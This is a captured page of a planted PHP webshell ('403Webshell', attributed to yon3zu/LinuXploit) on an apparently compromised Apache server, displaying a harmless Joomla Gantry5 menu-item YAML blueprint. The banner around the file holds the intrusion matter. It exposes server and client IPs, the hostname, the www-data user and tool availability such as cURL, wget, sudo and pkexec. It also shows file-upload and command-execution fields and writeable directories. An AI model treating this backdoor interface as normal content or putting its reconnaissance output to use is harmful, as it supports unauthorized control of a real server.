403Webshell
Server IP : 104.21.84.107  /  Your IP : 104.23.243.196
Web Server : Apache/2.4.63 (Ubuntu)
System : Linux adminpruebas-Virtual-Machine 6.14.0-37-generic #37-Ubuntu SMP PREEMPT_DYNAMIC Fri Nov 14 22:10:32 UTC 2025 x86_64
User : www-data ( 33)
PHP Version : 8.4.5
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/fcs/administrator/components/com_gantry5/blueprints/menu/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/fcs/administrator/components/com_gantry5/blueprints/menu/menuitem.yaml
name: Menu Item
description: Gantry menu item.

form:
  fields:
    items:
      type: collection.list
      array: true
      label: Items
      key: path
      value: path
      ajax: true
      skip: true

      fields:
        .path:
          type: key.key
          label: Path
          skip: true

        .enabled:
          type: input.checkbox
          label: Enabled
          description: Enables the menu item.
          default: true

        .id:
          type: input.text
          label: Menu Item Id
          readonly: true

        .type:
          type: input.text
          label: Menu Item Type
          default: link
          disabled: true

        .link:
          type: input.text
          label: Link
          disabled: true

        .rel:
          type: input.text
          label: Link Rel Attribute
          disabled: true

        .attributes:
          type: collection.keyvalue
          label: List Tag Attributes
          description: Additional attributes for the menu item list tag.
          key_placeholder: Key (e.g. style, name, ...)
          value_placeholder: Value
          exclude: ['class', 'style', 'title']

        .link_attributes:
          type: collection.keyvalue
          label: Link Tag Attributes
          description: Additional attributes for the menu item link tag.
          key_placeholder: Key (e.g. style, name, ...)
          value_placeholder: Value
          exclude: ['class', 'href', 'title', 'aria-label', 'target']

        .hash:
          type: input.text
          label: Append Hash
          description: "If you'd like to append an hash to the end of the URL (ie, #to-bottom)"

        .title:
          type: input.text
          label: Menu Title
          required: true

        .target:
          type: select.selectize
          label: Link Target
          placeholder: 'Select...'
          options:
            _self: Current Window or Tab
            _blank: New Window or Tab
            _nonav: New Window, no Navigation

        .dropdown:
          type: select.selectize
          label: Dropdown Style
          default: ''
          selectize:
            allowEmptyOption: true
          options:
            '': '- Use Default -'
            standard: Simple
            fullwidth: Extended

        .dropdown_dir:
          type: select.selectize
          label: Dropdown Direction
          description: Where the dropdown should open relative to the menu item
          default: 'right'
          options:
            left: Expand Left
            center: Keep Centered
            right: Expand Right

        .dropdown_hide:
          type: input.checkbox
          label: Disable Dropdowns
          description: If checked and the item has dropdowns, they won't be rendered.
          default: ''

        .width:
          type: input.text
          label: Dropdown Width
          description: "Set the width of this parent's dropdowns in rem, em, px units or auto."
          default: "auto"
          pattern: '((\d+(\.\d+){0,1}(rem|em|px))|auto)'

        .class:
          type: input.selectize
          label: CSS Classes
          description: Enter CSS class names.

        .anchor_class:
          type: text
          label: Link Class
          description: Enter link class name.

        .icon:
          type: input.icon
          label: Icon

        .image:
          type: input.imagepicker
          label: Image

        .icon_only:
          type: input.checkbox
          label: Icon Only
          description: Display only icon or image. Hides title and subtitle.

        .subtitle:
          type: input.text
          label: Subtitle

Youez - 2016 - github.com/yon3zu
LinuXploit